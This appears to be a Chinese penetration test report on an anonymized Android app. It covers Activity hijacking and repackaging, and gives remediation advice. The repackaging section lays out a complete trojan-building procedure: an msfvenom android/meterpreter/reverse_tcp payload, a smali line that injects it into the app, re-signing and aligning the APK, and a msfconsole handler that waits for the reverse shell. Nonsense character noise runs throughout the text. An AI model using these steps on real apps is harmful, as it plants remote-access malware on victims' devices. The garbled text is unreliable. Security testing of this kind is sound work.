4 ]0 z3 C4 ?9 e, j+ F4 l
# T6 y/ m" ?6 ]5 ~" G
' ?( b$ L! x9 F7 |$ ~1 E . Y. U c; ~. W" j9 Y& T$ `2 Y
+ E+ T# s( ~3 n, `
表1-2 测试结果 2 \* L# |! S" t- C; h) s+ J8 O6 O
; o- ?3 y) s; W
# l" X3 Y+ d- t
) k" x O4 o& F j
6 \! J( ^1 L5 t
& ~/ g) }$ C7 D, o# A6 \
3 [7 j1 F* c8 N+ j4 n) \; a: b& n8 C$ J6 b
9 q; Y9 s0 s- k$ D/ E& t h! w' b2 E) d* A8 s; _" K/ m, [4 b
& r1 f' C8 |: e: }" t5 @& C1 d% J# m
2 检测结果 $ G% P9 y0 D0 E" U( ~5 m
2 A5 t) N' C4 ]$ O/ n, g: r8 K
3 t% W& `* N, x: Y& B" ^
: O7 @2 M, A+ E
, Y- k5 g' ?( |; `
3 r+ S4 k! U! ~3 z- m
2.1 某某某
- N- y5 D$ m2 P/ g& b" u5 o1 s2 {9 a U/ N* x2 A
7 v8 Z- [" R ~. a$ \9 i
3 v+ g0 c. m( c \: G* }
3 l7 g" [" e5 I/ U- h. z$ U# m- R
2.1.1检测目标 3 @; s# A3 a3 f' N7 T1 T
$ K K6 G$ _, E: P
( D. j+ H4 l) ?6 d. J0 Y. u! H' T! n+ y' u8 d. U! u4 ]0 N2 @2 J+ z4 l
Z( x7 w$ {( E4 Z# [, j$ y- s, o3 i
& c- c9 j; Z( | Z5 F+ K
目标地址: 某某某某某某APP 4 M1 s; `0 w; F5 c- x/ f
5 X+ T0 B( _0 g1 P
) z! P8 j& N/ r6 L+ e/ k- V z# h* Q2 K
$ v8 F+ R3 O1 ?: m: ^! P
: U, b! D$ |8 b+ y3 b5 f7 D& H5 \
& P2 N1 Z& N d5 Q t8 V 2.1.2检测结果
& Q5 _8 A p1 ~0 e- A0 _3 V0 j i! k, [. G
/ B* q8 R0 K- r4 `, }& W/ p
- \; ]/ g4 S: E+ {5 z
+ [1 M Y+ B1 l4 z& l. O5 z* c! V* ^' t; m; n7 Z5 e# M
2.1.2.1
l) t, }$ ^$ |
# v- t" j) Q) \" w# w. q
+ X% l# U, w9 l( O$ E5 p# j+ ?& ]% h7 k5 a c4 j! M
) O9 d4 d, I0 `1 g% d9 m# b7 | e
- r. f, O( G; G, J4 H. r 漏洞链接地址:某某某某某某APP + y/ \* [$ b8 I# h$ F/ e
. \" i& i% f6 X2 v
3 I$ j; E Q5 v/ G* l* k. ~ g5 x, \7 j7 h& w
7 \9 |( b6 d- E/ A
@9 W6 N- c' ^- G4 B# }4 c . |4 K& k0 G7 u: x5 O! d
1 F) C- v% u! r+ r+ x+ R! i `
/ V" t7 [" o4 }6 t, V
3 G8 }; \) r" C" K0 [ w8 ^
3 \8 C9 i7 G9 }3 Z5 U( }
" f* ]- e! X$ n; p# k" r 漏洞分析及取证: + x2 c; f6 B' r' T
) c9 \, M( P' b3 S# B
/ ~9 S+ W; M$ e8 `+ d' I; `2 A- d; I0 t D1 w" ?+ x' _" ~
# x! ]; R3 \- e9 [) b# m
" N4 S6 S" v! l2 L) E6 U
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图:
0 C3 V& U1 B) J7 _9 b
" P" O; W' g5 |8 E: K8 N8 x$ m' M
3 H$ w) l) p8 s0 D* ~
$ |$ R; o9 r5 R" O9 h. i+ S 6 \' s3 K/ O, v9 X
: d0 ]! \8 L7 D7 s
) j. O; j0 |4 i/ @: m+ `/ O, V( r) K; m9 Z& S( ^8 B
0 A) _* B3 u0 |, y
9 c6 A4 ^" l+ B8 V8 D! V
6 ^* L" R1 b; S0 `# R$ U- `) q) P% h9 C* p/ J2 m, m
( q7 \3 y+ K& l' Z
: ^& P( E, p2 T' o: p. p
% G8 e4 M& r3 l- _$ H, w
2 j5 N5 Y: P5 k; G' F
% B1 ~: E" U4 V, X% w- Q8 s2 Y, ?. N+ a6 T) I3 [' |0 o, J j+ D
& X. [" r" u' q+ ~! S# q. j" W8 o0 k
- F: N; `. _8 D
& d8 `7 Z5 m/ q! L $ F0 ^) M+ \) B C! l$ ` |6 n
" X! @) X6 P; I* h T
4 ~1 S5 D' l& t$ g) E
) Z3 _- i! u1 C% O# ]: m
$ U4 r! e: ^' B
4 O* v* M0 x* @7 I$ q p ! E5 Z! n% z {5 T; P# U( a
9 A; b E1 ^. A- v
" K- B3 d. z% {' S: J
, ]1 W- l/ d' K0 F+ Y
( ~# M% v" J$ y6 s0 P
% A/ }7 y$ A# J* O
/ a7 g- Z; Y: R& b( _' Q
! E$ m2 ^/ E2 b' Z 漏洞危害:高 6 {% l# v) \1 [* P/ O. K
2 C) H8 y. H, }- w8 [
; k/ T5 B! E; m& [, b" C# |( p* t3 U" n( c l/ a, m8 n
" o' Z% @1 N- C8 b3 v! O2 v( ]
) Z. r: l% u) v0 q9 I$ g% D5 B3 c S 6 ?7 {6 R* X, }; u
0 R: `/ I8 z! W, K0 U. v 6 {: h. Q9 g. e# t$ x) C# f
- C8 f. T8 H n
0 S1 ]% r; {/ F0 O# x
" V K; B' u6 J/ S$ N: s* [% w 3 V! d# R8 e/ O1 U! U2 I. ~+ f
$ Q& P" I- u' F- R& y
. o* v9 s/ r2 W8 p2 F: o5 N! Z. j3 }8 x; h0 \7 e: r
严重程度
' t z; {0 z5 a+ u
; @* A9 C& ^, @& f5 G
; f/ J; E* C6 i9 f, w8 `1 M
2 t5 K% d5 x, z6 Q# ^9 b |
i ], y2 k0 v( j: `
+ f n) e! k9 s' x+ Z: [
% C+ p% ~+ F+ M! X9 S* s; I8 @; L8 C' d6 [) h5 v7 \0 G
- [& o* `, b0 C" a5 h7 H& u1 w2 |; j
1 l& l9 ?9 ]% v; n0 o. u& f
高
9 E G- E" k8 K6 i% ^/ {* M; P0 k0 k* Z
5 `; E% u1 p5 W: ?8 ?1 ~; U4 c
2 a; W# ]" U% m9 ]: y6 n1 v3 W |
9 m$ o6 ?3 s' T* s$ m+ t7 J/ `8 d
0 E1 S# x2 ]/ X% v; z& X 1 O) S2 G+ n! S# d$ @! `
( _% X! U# n, Y ) d' g9 K9 {$ T8 d7 R
8 v' R# i8 f7 K Z ■ % T8 J% G" \7 C( ^
3 @* s( @8 E5 c6 b% W! n$ P+ G
( C5 N8 M: O" Y, ]' C# J: n, y# G3 j4 A" }& r. {. b& G. E0 z
|
% i# Q) S$ j% m1 O8 y) }8 E# m3 U& \3 ~2 I3 E
' \1 [' @# m4 s+ Y# J, W
1 x' v, e) l Y3 w% q ? ; `( A; I q0 i$ P7 e8 P: O+ s
j* h0 H( f l4 h$ H3 b' _
中
2 A) c, h# u/ o& D8 H9 `+ z/ M/ j
: t+ |) a$ q( b, ` & ]1 K$ M g( M8 r* B( j
6 d' D" n* v3 {: Z4 D | . ^+ c3 Z* w" x0 `2 r9 m) K
. J/ ^( ^ o4 W( T0 D
6 D1 f2 K4 X* I2 j9 w! ^+ B2 K J
& |# j6 {4 o' R1 q# [ * b, D1 ]# d' A: \
; ? W A1 C4 o0 |' `
6 m& @! ~9 v/ h1 b1 U0 D$ ]5 A, \4 ~9 n; J6 D
& D3 x& l$ U( P7 Q+ e; `- V) @) k/ d6 ]- ]+ o+ Z7 ~& v
| ! j# S3 _8 }; b6 K n1 y
1 h9 U0 G1 ^8 `7 @, S
! Z+ W- L# }/ c* _! Y( u
4 c0 M ^8 J, M7 Z. m
! c4 ^" E' C9 z: H5 y, E, ] a z0 [$ ~) e' q1 B
低 0 F( K5 M, U1 t& u1 Y7 e
5 F K0 z+ D$ y0 D. h
& n+ C3 ]" Y4 R: B; n) N `. K* [9 [! K j* Q
|
) L- g6 h$ J& r2 c; Z
2 V W2 @# _% A& H 0 ~' R, R' m/ v) p0 D% f5 ?& q
; ]7 D) W8 Y7 O; O% N, }
' h4 N" X& s* y: w" K3 r! L
4 X' w1 L6 F3 _+ e$ t2 L A7 Q
$ p6 w3 l) Y' P( \' S+ f; }3 U+ E/ ~' z) e
8 a4 {4 q3 a/ O' J0 h! V0 m
1 ^9 Z6 \; j d( H
|
3 D( y$ ], w7 n: d( r) A" }" \
& L$ P1 i. z$ X* Z# W) J; ]
( [! R- K2 N3 x+ x( n9 Q
1 F6 |8 w3 S2 y7 c ; b# Y( P9 q2 ~
$ }/ ~5 f5 K8 \' \/ G7 y6 o, ~* B
0 x2 D) a. Y* q$ n/ r8 h0 @7 V
4 x% I1 P8 u$ @/ w, r
" T2 M* y1 E' e
( d& O7 B% N) d# ?3 r5 ]
7 c. q: S% L: s5 N$ a3 {# L; Z$ n9 a2 {/ I
- j. E9 X, m1 \* I. w. c
% P; l# t% a2 v# I" X- z0 ~
, m% Z1 f6 z# v8 \
1 Q( H( u" r1 f, E+ D1 d 0 \ g- |1 v4 J% o
0 x! I5 C% E1 d; Q' U+ k# f
修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。
, A+ J: X' [+ }/ i* n1 r+ L& Y% x# o+ Z; b I b
! b, L, J( |' r8 A- n/ b
1 T3 N5 z0 G: c% \; j
, J3 N6 W; q8 C5 m0 \7 a! F( a
# G# ?+ y/ k6 T8 _
$ p" }# P& r/ a3 j
2 w2 K3 I9 k4 B G: p3 J
4 h3 w, b, ?1 t. C6 _
( e* j+ R/ W9 [2 B2 F, `
$ s1 i' s' S8 Y! k. I8 U# j
! v+ V; r* {! e! q2 n
1 C+ t" v( B: P4 B" x4 N6 w k! x5 h; y# \7 Y7 D8 Z3 q3 e$ ]* P
$ m N1 [6 N, J( i! Z, s2 z
1 s7 k: ^8 T- F; d( q9 }& t
0 X- M/ l% n4 c; M. X3 _# F7 W
$ g& ]9 k" ^! f" ]5 g& D5 Z 2.1.2.2 " g# I4 e1 l3 l! r$ X# t$ q8 H
& j$ r- J7 S1 ^: R' ~! g: o
$ E: c! ~) Q) ]% H
5 ~9 V% z1 O) K- y " b P" Q7 K a) k# T+ n6 h
* ~1 H) R: `( H7 g 漏洞链接地址:某某某某某某APP - `1 j& D- g' W8 j! p
& j4 A, p2 g9 {6 Q. s% C4 Y
8 `" ]; E& `- E& n; ?, B8 T- ^5 }
5 p* @& g0 ~, m
; {9 Q3 Q5 p$ P/ B
4 Y$ d) N0 F1 w! E* n. i* _5 D 漏洞分析及取证:
8 @& y, @, L4 y( ^) U ~, B$ T
2 p3 k. B0 l- `% r
9 D- I' s. y/ c; k/ w7 l9 G+ {1 p/ v/ j
5 G) |7 u* b C1 a: @% m% i# W. v6 V* x& ?
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: ( s& O7 X4 I+ D0 W3 v! C
7 w; Y; t* s }9 n9 }) I0 r" w
. _4 _5 _& c k. ]& K6 h, T
7 m9 s6 J( w* B( F
; Q3 y |3 J$ U, C* A- ^/ B8 @ |
. H4 N. n6 S/ x% g; e) ?3 r
用Metasploit 生成木马 apk 0 F% p7 A$ C& j
8 r# n! z" f( C6 \0 H1 e' x4 x+ {
) C; w3 d6 i: j) e3 |/ B$ G
0 e5 F4 r+ e; |) r( S , B! Y& I: m/ q6 k$ X+ |1 a
2 `3 O! y9 v/ f5 g msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk
$ o4 p6 S& |3 E
1 Q- }6 I( i# p/ s
" Q3 Y2 Q2 H" M4 X% I1 S/ _& v
3 m) p9 G$ V( t8 X( c! c
! n6 {5 \* o4 t; N/ U" d
# `& ~9 V2 ^5 |) t4 E5 E 反编译目标apk和木马apk 1 _$ ` ~; f% q9 b1 C" W
, v! p4 U* r+ k% q7 W( R4 l
/ D( m: t& P2 N2 y0 n7 d9 N' x0 a! D b7 g* C
6 W( d- T! h0 ^* Q( I( E
1 v9 M2 W5 U! h& c8 m. P
apktool d target.apk
4 }9 p- c# D: X# n
5 c9 y% F$ p- n
apktool d cockhorse.apk
, R4 C4 w; q- ]+ [7 A4 x7 j1 s: H+ E4 j
. \& k8 G& R" Y" a: d
( W. O; V9 T) f! y( g1 C( i
2 A) \* k, X K
( s# }+ i4 q# w$ Q9 T. r 木马 apk 注入目标 apk
) R$ i2 ^8 \. ^/ K7 E# @4 U, W \2 x7 y
2 F! [7 @% ]" O# t) T0 d+ _ X
) N9 i+ b* f: p8 A* ]$ a
# Q- B, {; t2 l) v% M3 H" f& q+ R
' Z" ?8 c0 k% l6 ^/ k4 N+ d9 s6 D4 x 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
1 S& p/ |, T: j7 ]% j% d o6 F4 \6 n# l6 h
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
1 j6 |" h% \. y# ]: v! P; G$ s: e
4 L" A* T7 G- D( s
) t, y: ~. b# r$ z5 m
# e/ v# }3 a. }9 l: H% s ) _- \6 f6 ?+ F
; J! m- ]# w5 x Z1 v" o 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复
* b- C8 E3 O) | |4 G+ ^: v5 O, N2 p: B8 H2 F; R. X4 K( \; P- u9 P
; D& F* S; _% k- N5 h
) H4 ^4 @7 W: C6 d' {" z8 [ 9 C" @4 Q8 q2 N- n7 g% c1 @; S
/ \2 M8 k: R0 w: z" c/ G 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下 / y7 s' h* X @( u" y C8 v, y! O- U
& K0 w# [. a2 ~, Z+ j; u
5 i! D4 L, D7 N3 }8 N
4 y0 `5 C( z, \& c( j
6 \8 [# {7 J" Z. o
8 q" {* M+ _2 @3 [ 回编译生成最终 apk
) Y8 c; w6 [6 I, ~1 Q5 f9 Y% i; @8 f' [6 ]6 b T- }& Y v/ d
& j& Y4 q% j+ |; b+ G! D' d; {
0 N- P, F' E7 z
9 l9 s+ x+ K Q0 E
5 i& R$ f9 j3 G: C7 s0 ]: ]; K% y: D 重新打包 ' i; `- l+ s/ S$ H [, n! c
, ?$ t' f- Y) o+ x; k
; | m" S2 d" v* |
1 ^3 P$ ?) K# y: @; t, r , W! x( M1 ]5 G/ C; a3 E) h0 ]
. F, a& Z, V7 R2 ^" B' [3 J( B" k, m
apktool b -o repackage.apk target_app_floder
: U& E8 o; O5 m2 j: Y8 T5 F, L8 }# S2 v9 e& R) J7 W( ~% {0 u
: B3 B5 {$ k2 V; W7 u! K- J; d ]/ \+ ]! d; w" F7 I) A @( ~$ n
+ J# S; u5 R/ b6 B! o3 G$ d! w* V6 r+ A
创建签名文件,有的话可忽略此步骤
7 |. q3 e/ b2 G
" N$ }( }1 Y1 @2 A
3 f9 v1 C9 s1 F" j5 T
. _9 ?0 v- f2 v6 m- c ( e) F0 g# V% T; b' ~
; v' [/ A+ g1 ~0 k4 V) w' O6 L% m keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 " e5 S& \; n7 U" U
1 Y% K I' L3 K) P
1 t& [$ A. f) h8 X9 _+ C! d/ R2 o; j t
# S H4 ]; T& r4 \7 y6 x
. x! J( I" g" T6 e! e x2 t1 J+ o
签名,以下任选其一
H$ `6 Y8 k6 ~) Z% a8 K5 Y$ ]2 P) S" i3 k
1 |! j/ d! D6 k1 f) V: |2 R
; R: v5 x: m$ Q/ k
. p- r$ f- D+ u) U8 Q6 d
' M% W4 R% S" F# K jarsigner 方式
) s8 h( X2 {" l7 a. Q0 t) e; W' n0 I; } f8 V; y" n s
5 k e0 W% y) Y& ]
. N) {/ v' x: {7 j% t8 l + w, F R: h& L* r. o
* f+ ?- v$ y0 B3 I$ a! ~' u
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname
9 S- |/ {4 B5 i0 `5 a* i5 \: B: d
% X( r! A1 U# N5 C
0 z; q9 D( I0 M+ i! o2 }" ^) O Y0 V8 t8 U
$ w4 ~8 \/ |. T; ^* {
5 f$ e& d' d) K! |. x, f" F$ @ apksigner 方式
3 y7 u/ e/ L2 H0 ]4 }& V+ r l# R: s% T! q) c8 f
% z5 ]# j, @, E+ \# E
7 x. p6 ^5 T! u) P
7 c$ a$ P6 J6 S" q6 o0 @2 O, e
6 J' ~# e- E" k apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk
4 Q- a* c3 j: }* I" q- H, Y$ I
3 t- }0 b) Q: D C% ~8 J
& Q1 W& Q8 h9 _6 j2 Y. T" i. H* |
! f# o* e0 a( K4 |
$ E7 R A% M4 C4 o8 t! P
4 W7 m2 l$ W3 i. l8 z" T 如需要禁用 v2签名 添加选项--v2-signing-enabled false
% Y; y6 O, h! K* G* h; @/ _% ]4 R- @$ d+ O
4 @" Q: s) Y+ q0 S4 m, P4 ~/ I: }2 G& a5 s
- {; V0 Z& I% E. R/ o
8 @/ [1 U4 g l" G
验证,以下任选其一 / ]/ O' X0 H0 V4 F2 l6 ^ E
4 Z3 `( Z; I) l
p9 s& b6 X X1 x; z7 W4 P3 _9 ^
; t4 s+ W3 G) j8 z& N- J
% S' @0 \1 k) j. C- J# B! ] jarsigner方式
7 h: L7 ?0 y" J8 T) P l- l; I7 p+ x5 ^; w6 M( z
6 ]2 ~: T0 X' o c
! e+ [" P6 E" R# R# p ]! {
1 A M# e' m" f
+ W" Q4 C( q8 F7 W3 U jarsigner -verify repackaged.apk G$ F5 X, C e% j# n
1 s& ~1 X/ I0 ]" t, B; F! S' e* I
6 M4 u9 ~2 l+ _7 \6 c& I+ {, }: o9 `- T' ~4 P4 [6 ?% r, _6 x: ]
% @. W Q% r) _2 T. | C+ w; Y5 ?, {# {" X
apksigner 方式
$ Z5 j6 d: M+ u$ Y$ J. T$ }" L4 z# M
6 p* I R$ L7 i4 ?$ O. f
5 T5 E7 f' C' f( V 0 B) Z, ]; }6 ]% u j$ M: c
; O$ b8 F4 i: |0 x8 ?: j
apksigner verify -v --print-certs repackaged.apk 6 R3 K) ?7 m4 Z" d9 G
( \4 m& b. o! o7 J$ H2 R
$ F" i/ R* ^- X# ~2 W4 z
" p# O) k; b, s
& @8 `! c, I# x$ s4 w& V* C2 r" P' a
5 K9 y% P9 p3 |, `' H keytool方式 ) \$ O. r0 p* R1 z
' o2 E7 b3 c& V. t
& i% q) X. P! _
6 G0 q' D' i7 P T6 J; O
! U6 L6 a5 a0 m0 ?& v+ y; ^# _
; {: F7 s, b& F" } M" h
keytool -printcert -jarfile repackaged.apk
9 U' m$ |$ I; ]' c! I! k* g* g- z/ F1 O4 C2 o4 }8 ^- |
1 k$ N; Q! o$ d7 z, q" z8 @; i
) j& \2 H7 V. [! g# M7 } # }3 f8 O- e1 B) _) m. f( Y/ n
/ M; F+ M0 [" S0 h 对齐 & a: o( v* h# S& E/ f
, T0 L H5 b8 g, c8 V
3 f P! p t+ O7 p5 L8 M
2 E: D$ u. w& @+ G" w; V
' x/ }# c! ~4 @7 L
! Y3 x* `/ Z; Z 字节对齐优化 $ i+ G: h4 N" b/ b' j* D
; Y1 O3 h' t! g
+ {# B/ W* Q2 k
# M2 u- [8 x6 v% s, r5 S
! Q( |' A( X0 [) }! u1 y- P) k4 Y9 U0 F; z1 r
zipalign -v 4 repackaged.apk final.apk
$ v3 e" Y+ a* I. |
: E. s" }7 Y( D# a& J
+ D8 k: z! }2 G9 M, q H7 q/ h
6 x/ O [$ e9 s) m. m" @+ K# Z. J
+ O; O6 M3 t0 b( A$ F Z
9 M% S6 W/ t# t1 P/ I3 O: Q
检查是否对齐 6 t: Z1 Q1 c' ]/ w8 |6 K; q& j
, ~* c$ W+ Y8 a/ y( U1 ~! z- n
4 o* D2 p: i' d/ a2 ~+ l1 p9 b" \# ]8 g
/ T6 X) Y. J7 j0 M8 }3 A4 o
# P; E7 j4 N) F3 l$ ` zipalign -c -v 4 final.apk 1 S$ V) }8 G2 x j
: m- R* i% l- H
$ x& S9 z2 i, G% l
& z: O/ F9 `3 [* } 9 t' u. O3 A! f5 {( P7 R0 A
; r$ e4 w2 L" M8 `# T) C( @; l 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 ; t- O& N9 I+ T) {3 ?! a7 _' ~
- L* N2 Y' ]" Z9 V, ~
9 u6 w3 ?! K4 B* |
% T' }& L% ?7 b! ]
- ]- P+ |) Z+ T; j* }; b9 Z/ l6 I. w% |
启动Metasploit控制台,配置参数等待上线 9 u' {/ ~, J& i2 M! Q I" x
$ |& w) p' D3 |) r c: m
; C+ A% e, {/ t3 e y, {7 c
$ v! [4 h0 c* Q% v8 k
2 g! g9 c X/ t+ M. S9 ]: u; ~3 ~2 L# p4 a; Q4 S) e
在终端依次输入如下命令 , ~! o+ f1 ^8 J, t/ c
: w$ n/ e& u$ P6 Z
( _- ^+ u. o0 u( P
% R6 ?+ J5 C0 E; }# C: Q; e$ y$ @
% |: \! N6 I, A1 s1 p
& g2 y$ }0 h* ?1 B
msfconsole 4 a9 L: X" U& e( k! o5 b$ G
D( k- C G& X
" V( H" Q0 L, Z2 s# j0 [- R
6 o$ @1 q1 f0 R. N( j, A3 R
7 S$ O, m6 S6 l# `
% `1 `- b, Z% F# d: Z# _, x
use exploit/multi/handler
# r, A% _, C1 M8 E* B# x" ^& [! q$ e& H) r3 n. K: C
0 M J; `! N: G/ J2 S5 ~9 ~- }2 u9 k& D9 J% K
4 c" \! A: X3 @4 v$ m
! s$ {$ `5 W z
set PAYLOAD android/meterpreter/reverse_tcp
3 W' y/ T9 `3 K! Q9 a
9 _, x2 P' \, U& h& s8 j2 B8 c
( c' ~+ _) b2 _* K8 k2 T
1 l' R2 L1 N! ?* c: \5 F; h$ U
h5 [9 p m9 o+ l$ q
4 Z7 ~, i4 q9 h, y7 o set LHOST 192.xxx.xx.xx 0 ~& ^+ U" V5 Y; F3 u w9 C
9 I8 H7 ]* b$ O& e
/ x- \3 F3 o$ X- A& w5 _/ s
; S0 W& r- X; x1 q 2 P9 E r0 q% Y0 ~. P: D
* U% ^8 I$ X. C1 a1 D
set LPORT 4444 ; K- V4 n( u; V. |3 }8 }, a- {
" t' J+ ]2 l, ^8 t
# R# W% Z& b% o" v' }
/ B( K0 c; o# [( G9 W+ [$ Q9 T% G
: S6 |0 x8 [9 p! C+ ^ H X* O' _$ |
/ w9 ]& p' B3 a* a; j exploit ( u0 A& i, R5 ~) K h% ]1 I
{5 F1 ]4 \! s( Z: v- t: |
/ D% p/ d9 `: G' l* ]0 w4 p
+ @9 z7 f+ q1 \7 [( w/ \
# b6 m0 [# _2 T3 u9 k
( z: x1 u x& k6 ^2 `- J: D 之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
9 g# |- }+ L. @
& ?; G/ R8 t: E8 h1 x
2 m$ L6 A- @/ k4 L$ V* Z1 S1 C4 K9 R) h5 w- L# ^6 J/ c T2 M
^; Y$ x( t J0 z, m
$ X$ S4 ]. E$ ~ 漏洞危害:中
. L. t# i8 U3 i9 X. T+ ~( j' z0 g8 L) K6 t
' \7 i1 b& Z, X. s, k
+ _* U2 ]2 m% h( \( c( B 7 p2 H w) ]% ^( M: u: j
7 k, u0 k( s# M+ c; Z; c
, G8 w- j: E/ J5 I; k
4 a% X# o4 p; [: a! g j
$ P. t, I2 |) Z3 n$ p' _
- p$ Z! h; v: B4 S
9 \5 y5 D) O( g: r. v# w R% k1 _( n3 [% [
& c- n5 u/ ~* z( B/ j3 o
* a" K% d3 U$ z! }4 t- ^& H0 o
: ~; |% R9 T& m: w1 `- g) y; w* p8 i8 p6 i# N9 ^2 [' y2 U
# n( B- L! S( J4 P& J3 M% ]4 o' D& p, n! ?
严重程度
8 L& ?; q+ i' y2 j% m3 i3 H: I. }! b: @# G& K0 D) O
: J- ?9 B4 d: x Y* _$ O! S& J* g% `4 X4 p
|
" |- d2 [1 ?! p% V) u$ Y
\+ |! ?0 o0 ~: d
3 O7 s( T4 a# G, D7 M& S2 F' E {/ c+ C+ k3 s! Y. C
" V) f+ |( ~& F l% o# k1 A# g$ {
- U9 O4 ]; E5 Z* F# p 高 3 T2 S) U# ?2 L! C, t2 b& v
+ D3 s* u# c. U2 y% f
]' m2 G& ]; w( K7 W* ]% L. i3 j( e/ o, F; E2 M1 h3 M
|
7 b2 L$ s) B# S! l# O' e+ p2 y; ~: }/ M: T
* L; l2 r0 Z+ l! M5 e5 T9 S6 j! Y
( C/ J6 R- ^; h/ J% \0 c
. a9 J- N/ {9 z9 [9 J( d" ?1 n/ |& d; }2 S
■ 1 L; ~( |# m" B/ ^
5 [& i5 |& q* O/ i* q8 ?" o
- S& X9 ?& u; c, }( V7 O% M j
3 q3 S. w) ]; b, ^: S |
: S& {4 M6 \2 e, b+ n% @8 b0 O2 V# ^! ~ F& x5 G
( `7 z5 W0 J# v$ y% C
2 m% I7 [- D" s5 M
6 b! j/ V, o5 z% _6 @6 v8 Z% b: J: B/ J8 o) F6 N
中
/ m: E# h0 U8 R6 ]: f0 o# Y6 y- |' O; I
3 d; u! ^. ^* Z/ Q% C5 \) s
- z* K( s* D7 o/ A
|
2 u f$ U( G6 p( N6 P! |! [
2 G, |( l9 A/ R% N % G6 {# _+ s0 G# A/ Y8 P1 c
- o2 I( ?; O6 B; t# T, Z/ ]
5 H( f- |6 K5 m' z% Z- i# t) S2 ^3 W/ s! }% G. K& z8 G0 A
: T' k8 T4 ~) W* n( {' J j' J% n( b4 \" S' D8 ], o& B# c. E
& e2 e$ A$ U4 `6 J' a+ p$ x _- q8 _
- @; g6 O' ~6 K
+ g W- L" G: E i5 F2 }
$ H- j* \$ _1 C4 \5 C3 } |
0 W7 }( L r9 ~- x q! w5 X' a/ P$ N8 c' @5 ]" H7 s+ C) j* L u: M
1 K7 t. J& n9 G# L$ F, n/ g2 U. y
' R! t7 O4 c2 u# m7 m, [! |
( m% G6 W3 [, p3 w" |
# Z9 H& i7 I& M0 D( B. D
低
" D o, R6 j4 Z" y8 q; ?
7 y) X7 l( y5 O$ H u! _5 n 7 ^7 a, ^/ g' j9 ^. F
Q" @7 D5 Q5 U5 \
| ; b( L* J- @7 I5 i# b# t* y
, v( @* d2 B; ^. }4 S- h H
4 A: n8 b) n1 _: a% N5 ]- \$ t
D4 _$ m$ u' Z* C, b. W( E& B
R* S# L5 u6 y# ^: z ~2 U4 B& }- c: Z3 L( b
! x4 a9 Y- E# x3 o! S9 Z% t+ N2 l* N$ O7 w' U$ h0 ~2 b
m9 _: G% a! P0 F0 C- T0 W* r; f
: @# g) C3 p, `+ k. h# r! r% p
) ~; E) C. }6 x5 H3 M$ a4 z5 `
5 K7 `2 G1 A+ o1 N7 h) a: `: k
| 2 h+ z8 d1 }5 x* Y/ ]
) \- Y4 o; P7 k
- W+ L/ J5 ]- y/ s+ v
) ^5 z9 Q; W4 D2 Q- D; m! j
! e" v2 E& T4 R! S$ Z- i
; [# a4 u {: n! } U
7 }$ Y" W6 z& ~: W7 k* d
# m) N" H2 G0 g+ Z
% E7 T, F/ X! P5 i
5 t6 X8 A- b7 u) C( X) a4 q
/ V4 \# T) g; _' q, Y3 O+ B$ p, G2 ^' X+ l
5 q( A! _( k: n% j
, j# v2 r$ _+ Y; a. q
9 y( R' w" D2 q8 _' D5 ?% m
! u# T$ {" W S% P. W( ~
+ W h; I# Y; |" E7 A- F/ `! R2 U2 c2 b6 q$ ?
修复方法: ) S/ _) g0 b5 S. B1 u: P: Q
k+ I7 ~% ~1 U7 S/ F# ^; S
0 g* Q2 ^8 w7 U" f6 E- c s
" j& b- }: d' o7 t : a- [; ?4 i1 i, d3 K. q6 k
2 Q+ h, Y! b7 V7 ^ 1.在 APP 启动时应做签名校验防止二次打包。
$ K3 r7 K \5 Y8 P& @8 x( w0 c
0 G& d8 j( V R. F! x4 Y 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 8 [$ z j! b' c3 R0 B
0 O7 s, v5 p( c- Z* x/ L
4 W1 c# i4 a- M1 j+ F
, X/ A2 }+ f1 F& @
; N, d4 y$ {3 G9 N& c( H8 q( L; z- t8 A9 Y) r
8 ~1 S6 {7 p/ b$ Q0 D8 S; @
/ z* V7 f8 h- I' y' |& E
8 W5 W6 t2 }5 A& ?) [5 t& t$ ?$ z2 \
2 S5 w# h6 m! e3 n6 l& T5 z
9 I( u1 s$ w b0 B7 H& U
% Z8 F/ o! k# C7 r& `, ^- F2 y
' U) i" z- i$ q
. I7 a* a( x# ]: h
% H5 h: a. j" y
% b! T4 Y* Q. z: y
, u7 U4 A3 w0 o* T) v
7 c% V$ ~. g6 R. T6 D+ ~
# U5 \; D# Q y: m: l* ^! o' k5 U+ R4 G# A; `7 c: S! [9 w